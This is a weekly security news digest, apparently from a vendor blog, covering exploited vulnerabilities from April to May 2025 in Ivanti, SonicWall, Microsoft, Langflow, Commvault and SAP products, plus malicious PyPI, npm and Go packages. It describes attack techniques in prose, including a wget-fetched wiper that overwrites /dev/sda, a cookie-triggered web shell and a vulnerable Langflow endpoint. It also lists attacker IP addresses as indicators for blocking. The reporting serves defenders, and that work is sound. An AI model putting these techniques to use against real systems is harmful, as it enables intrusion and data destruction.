05/07/2025-05/14/2025 Ivanti EPMM Vulnerabilities, Malicious PyPI Package Posing as Solana Tool, Thousands of Node Developers Compromised And More

1. Ivanti EPMM Vulnerabilities Exploited in the Wild (CVE-2025-4427, CVE-2025-4428)

Ivanti has confirmed that attackers exploited vulnerabilities in open-source libraries to compromise on-prem Endpoint Manager Mobile (EPMM) instances of a small number of customers. The flaws, now tracked as CVE-2025-4427 (authentication bypass) and CVE-2025-4428 (remote code execution), were found in unnamed libraries and likely used as zero-days. CERT-EU flagged the issues, suggesting potential breaches of EU institutions.

Ivanti has released patched EPMM versions (11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1) and advises customers to update or apply mitigations if upgrades aren’t possible. These issues affect only the on-prem EPMM product. Additionally, Ivanti patched flaws in other products: CVE-2025-22462 (auth bypass in Neurons for ITSM), CVE-2025-22460 (default credentials in Cloud Services), and an unnumbered authorization flaw in Neurons for MDM. These were reported by researchers and haven’t been seen in attacks yet.

2. Malicious PyPI Package Posing as Solana Tool Stole Source Code in 761 Downloads

Cybersecurity researchers have uncovered a malicious package on PyPI, named solana-token, which pretended to be related to the Solana blockchain but was designed to steal source code and developer secrets. Though now removed, it was downloaded 761 times since its release in April 2024.

According to ReversingLabs, the package contained a fake blockchain function, register_node(), which exfiltrated source code from the Python execution stack to a hard-coded IP address. The malware appeared to target developers working on blockchain projects, likely hoping to capture sensitive, hard-coded secrets.
The method of distribution remains unclear, though it may have been promoted on developer platforms. The incident highlights the growing trend of supply chain attacks targeting the cryptocurrency space.

Experts urge development teams to closely inspect open-source and third-party packages.

3. Thousands of Node Developers Compromised by Malware in Popular npm Packages

Malware is increasingly infiltrating the Node.js ecosystem via npm packages. Aikido Security uncovered a major supply chain attack involving the popular “rand-user-agent” package, downloaded over 45,000 times weekly. This package, used for generating randomized user-agent strings in web scraping, was found to contain a sophisticated remote access trojan (RAT). Though deprecated, the package saw three suspicious updates in recent weeks, likely after the original developer’s npm access token was compromised. Hackers used whitespace and code obfuscation to hide the RAT, which can execute shell commands and replace Python toolkits with malicious binaries. The malicious versions have since been removed, but the incident underscores the risks of compromised open-source libraries. Over 30 other npm packages used “rand-user-agent” as a dependency.

Other recent npm compromises include backdoored versions of xrpl.js and fake developer tools that hijack macOS features, showing that attackers are increasingly targeting developers and open-source repositories.

4. SonicWall Patches 3 Flaws in SMA 100 Devices Allowing Attackers to Run Code as Root

SonicWall has released patches for three vulnerabilities in SMA 100 Series appliances that could lead to remote code execution if chained together. The flaws affect devices including SMA 200, 210, 400, 410, and 500v and are fixed in version 10.2.1.15-81sv.

The issues are:

• CVE-2025-32819 (CVSS 8.8): Lets an attacker delete arbitrary files, potentially triggering a factory reset.
• CVE-2025-32820 (CVSS 8.3): Makes any directory writable via path traversal.
• CVE-2025-32821 (CVSS 6.7): Allows file uploads via shell command injection.

Rapid7 warns these can be chained to gain root-level remote code execution. CVE-2025-32819 may be a patch bypass for a 2021 flaw and could have been exploited as a zero-day, though SonicWall hasn’t confirmed active abuse.

Users are strongly urged to update their systems immediately.

5. Microsoft Fixes 78 Flaws, 5 Zero-Days Exploited; CVSS 10 Bug Impacts Azure DevOps Server

Microsoft’s May 2025 Patch Tuesday update fixes 78 vulnerabilities, including five zero-days under active exploitation. Of these flaws, 11 are Critical, 66 Important, and 28 allow remote code execution. The update also includes fixes for Edge browser issues.

The five exploited zero-days are:

• CVE-2025-30397 – Scripting Engine memory corruption enabling remote code execution;
  CVE-2025-30400 – Desktop Window Manager (DWM) privilege escalation;
• CVE-2025-32701 & 32706 – Common Log File System (CLFS) driver privilege escalations;
• CVE-2025-32709 – WinSock driver privilege escalation.

These flaws are linked to malware like QakBot and Play ransomware, and some have been exploited by APT groups.

CISA has added the five zero-days to its Known Exploited Vulnerabilities catalog, requiring U.S. federal agencies to patch by June 3, 2025. Additional fixes address bugs in Microsoft Defender for Endpoint and Identity, and a CVSS 10.0 flaw in Azure DevOps Server, now mitigated in the cloud.

04/30/2025-05/07/2025 Malicious Go Modules, SonicWall Flaws, Critical Langflow RCE Flaw And More

1. Malicious Go Modules Deliver Disk-Wiping Linux Malware in Advanced Supply Chain 

Cybersecurity researchers have uncovered three malicious Go modules—prototransform, go-mcp, and tlsproxy—containing obfuscated code that downloads destructive payloads designed to wipe Linux systems. Once executed, the payload uses wget to fetch a shell script that irreversibly overwrites the primary disk (/dev/sda), rendering the machine unbootable.

This attack permanently cripples systems and exemplifies the severe risk of supply-chain compromises. Additional threats include malicious npm and PyPI packages targeting cryptocurrency wallets and developer environments. Packages like crypto-encrypt-ts, herewalletbot, and others steal sensitive data, such as seed phrases and private keys.

A separate set of PyPI packages, including coffin-codes-net and cfc-bsb, used Gmail SMTP and WebSockets to exfiltrate data and enable remote command execution.
Experts urge developers to vet package publishers, monitor unusual outbound traffic, and avoid trusting packages solely based on their longevity.

2. CISA Flags Two SonicWall Flaws As Actively Exploited

CISA has added two actively exploited SonicWall vulnerabilities—CVE-2023-44221 and CVE-2024-38475—to its Known Exploited Vulnerabilities catalog, following the release of proof-of-concept exploit code. The vulnerabilities in question are listed below: – CVE-2023-44221 (CVSS score: 7.2) – Improper neutralization of special elements in the SMA100 SSL-VPN management interface allows a remote authenticated attacker with administrative privilege to inject arbitrary commands as a ‘nobody’ user, potentially leading to OS Command Injection Vulnerability

• CVE-2024-38475 (CVSS score: 9.8) – Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to file system locations that are permitted to be served by the server.

The flaws affect SonicWall SMA remote access devices, enabling remote command injection and path mapping, with one providing admin-level access via an Apache HTTP Server bug. Patches have been available since late 2023 and 2024; systems running version 10.2.1.14-75sv or later are secure. CISA has ordered federal agencies to patch by May 22, 2025. Experts urge immediate patching of all vulnerable SMA 100 series devices to prevent exploitation.

3. Critical Langflow RCE Flaw Exploited to Hack AI App Servers

CISA has warned of active exploitation of a critical remote code execution (RCE) flaw in Langflow, tracked as CVE-2025-3248. The vulnerability allows unauthenticated attackers to execute code via the /api/v1/validate/code endpoint on exposed servers. Langflow, a popular open-source tool for building AI workflows with LangChain, fails to properly sanitize user-submitted code in affected versions.

Version 1.3.0, released April 1, 2025, fixes the issue by adding authentication to the vulnerable endpoint. Users are urged to upgrade immediately, preferably to the latest version 1.4.0. Horizon3 researchers, who published a proof-of-concept, found over 500 exposed instances online and warn of poor security design in Langflow.

CISA has mandated federal agencies to update or mitigate the flaw by May 26. Those unable to upgrade should restrict network access using firewalls or VPNs. No ransomware activity has been confirmed, but exploitation is ongoing, and immediate action is advised.

4. Commvault Confirms Hackers Exploited CVE-2025-3928 as Zero-Day in Azure Breach

Commvault has disclosed a breach of its Microsoft Azure environment by a suspected nation-state actor exploiting CVE-2025-3928, a zero-day vulnerability. The company, alerted by Microsoft on February 20, 2025, emphasized there is no evidence of unauthorized access to customer backup data or disruption to its operations.

The attack affected a small number of mutual customers with Microsoft. Commvault responded by rotating credentials and enhancing security measures. CISA has since added CVE-2025-3928 to its Known Exploited Vulnerabilities catalog, requiring federal agencies to patch Commvault Web Server by May 19, 2025.

To mitigate risk, customers are urged to enforce Conditional Access policies on Microsoft 365, Dynamics 365, and Azure AD apps, rotate secrets every 90 days, and monitor sign-in activity. Commvault also advises blocking and monitoring the following IPs linked to the attack: 108.69.148.100, 128.92.80.210, 184.153.42.129, 108.6.189.53, and 159.242.42.20.

04/23/2025-04/30/2025 Broadcom Fabric OS, CommVault Flaws, New Critical SAP NetWeaver Flaw,Rack::Static Vulnerability And More

1. CISA Tags Broadcom Fabric OS, CommVault Flaws as Exploited in Attacks

CISA has added three actively exploited vulnerabilities to its KEV catalog, affecting Broadcom Brocade Fabric OS, Commvault web servers, and Qualitia Active! Mail clients. CVE-2025-1976 impacts Broadcom Brocade Fabric OS versions 9.1.0–9.1.1d6. Though admin access is required, attackers have exploited it to execute arbitrary commands or modify the OS. The issue is fixed in version 9.1.1d7, and the 9.2.0 branch is unaffected. CVE-2025-3928 targets Commvault’s backup web servers, allowing authenticated remote attackers to deploy webshells. Despite authentication requirements, it is being exploited. Fixes are available for Windows and Linux. CVE-2025-42599 affects all versions of Active! Mail up to BuildInfo 6.60.05008561. The stack-based buffer overflow vulnerability has been exploited, causing outages among Japanese SMBs and ISPs. It is patched in BuildInfo 6.60.06008562. CISA has set patch deadlines of May 17, 2025, for CVE-2025-3928 and May 19 for the others.

2. New Critical SAP NetWeaver Flaw Exploited to Drop Web Shell, Brute Ratel Framework

Threat actors are exploiting a new vulnerability in SAP NetWeaver (now tracked as CVE-2025-31324) to upload JSP web shells for unauthorized file uploads, remote code execution, and persistent access. The flaw resides in the /developmentserver/metadatauploader endpoint and allows unauthenticated file uploads. ReliaQuest initially suspected a remote file inclusion issue but confirmed it’s an unrestricted file upload vulnerability. Threat actors have been observed using Brute Ratel C4 and Heaven’s Gate techniques, possibly as part of initial access brokerage. Attacks date back to March 27, 2025, mainly targeting manufacturing firms. The shells allow system-level access with adm privileges. SAP has released a patch addressing the flaw. Onapsis and ProjectDiscovery have provided tools to detect and scan for this vulnerability and related indicators of compromise. Shadowserver reports 427 exposed systems, with most located in the U.S., India, and Australia. Not all SAP NetWeaver systems are vulnerable, as exposure depends on the metadata uploader being enabled.

3. Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers

Cybersecurity researchers have disclosed three vulnerabilities in the Rack Ruby web server interface that could allow attackers to access files, inject malicious data, and tamper with logs. The flaws, identified by OPSWAT, include:

• CVE-2025-27610 (CVSS 7.5): A path traversal vulnerability that allows access to files outside the intended directory, potentially exposing sensitive data.
• CVE-2025-27111 & CVE-2025-25184 (CVSS 6.9 & 5.7): Log injection vulnerabilities that enable manipulation of log entries and insertion of malicious data.

The issues stem from how Rack::Static handles user-supplied paths. If the :root parameter is undefined or misconfigured, an attacker could access confidential files
Users are advised to update or properly configure :root.

Separately, a critical flaw (CVE-2025-43928, CVSS 9.8) in Infodraw Media Relay Service allows unauthenticated users to read or delete arbitrary files via path traversal in the login page. No patch is available; affected systems in Belgium and Luxembourg have been taken offline as a precaution.

4. JPCERT Warns of DslogdRAT Malware Deployed in Ivanti Connect Secure

Researchers have identified new malware, DslogdRAT, deployed after exploiting a zero-day vulnerability in Ivanti Connect Secure (ICS). The flaw, CVE-2025-0282 (CVSS 9.0), is a stack-based buffer overflow affecting Ivanti Connect Secure versions before 22.7R2.5, Ivanti Policy Secure before 22.7R1.2, and Ivanti Neurons for ZTA before 22.7R2.3. Attackers can exploit the flaw for remote code execution or privilege escalation.

In December 2024, attackers exploited this vulnerability to deploy DslogdRAT via a Perl-based CGI web shell, which executed arbitrary commands if a specific cookie value matched. DslogdRAT then communicated with a C2 server using XOR-encoded data. It operates between 8 AM and 8 PM to avoid detection, supports proxy functions, file uploads/downloads, and command execution.

Additionally, another malware, SPAWNSNARE, was detected in the same compromised systems. CISA and Google previously reported SPAWNSNARE in April 2025.